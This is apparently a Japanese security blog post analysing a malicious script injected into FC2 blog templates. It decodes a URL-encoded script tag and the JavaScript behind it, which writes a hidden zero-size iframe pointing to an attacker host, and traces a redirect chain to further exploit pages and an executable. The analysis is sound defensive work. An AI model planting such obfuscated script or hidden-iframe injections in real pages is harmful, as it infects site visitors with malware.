いくつかのFC2ブログのテンプレートにiframeが仕込まれていましたが、scriptも使うようになりました。
| <script src="http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script> |
デコードします。
| <script src="http://www.hellh.net/w.js"></script> |
http://www.hellh.net/w.js
を見てみましょう。
| document.write("<iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74 width=0 height=0></iframe>"); |
デコードします。
| document.write("<iframe src=http://www.hellh.net width=0 height=0></iframe>"); |
というわけで、動作は今までのiframeと同じです。
ついでにhellh.netが更新されているので見てみましょう。
Default.htmが以下をiframeで呼び出します。
| http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%68%65%61%64%2E%61%73%70 |
デコードします。
| http://www.hellh.net/head.asp |
おっと、ASPです(CGIみたいなもの)。
処理は推測するしかありませんが、おそらく以下のようになっています。
初回アクセスのHTTPヘッダ
Location: error.htm
次回アクセスのHTTPヘッダ
Location: http://search.fc2.com
解析を避けるためか、2回目以降はFC2に飛ばしてしまいます。
ということで以前のDefault.htmに相当するページは
| http://www.hellh.net/error.htm |
となります。
IISのエラーページを装ったerror.htmは以下の2つをiframeで呼び出します。
| http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%64%76%2E%68%74%6D |
| http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%76%69%70%2E%68%74%6D |
デコードします。
| http://www.hellh.net/dv.htm |
| http://www.hellh.net/vip.htm |
以前とのページ構成の違いは以下のようになっています。
以前
/Default.htm
→index.htm (スクリプトその1)
→re.htm (スクリプトその2)
今回
/Default.htm
→head.asp
→(初回) error.htm
→dv.htm (スクリプトその1)
→vip.htm (スクリプトその2)
→(次回) http://search.fc2.com
ASPでの処理が入るため複雑になっています(Default.aspで処理したほうがいいと思いますけどね)。
http://www.hellh.net/dv.htm
http://www.hellh.net/vip.htm
http://www.hellh.net/vip.exe
VirusTotal
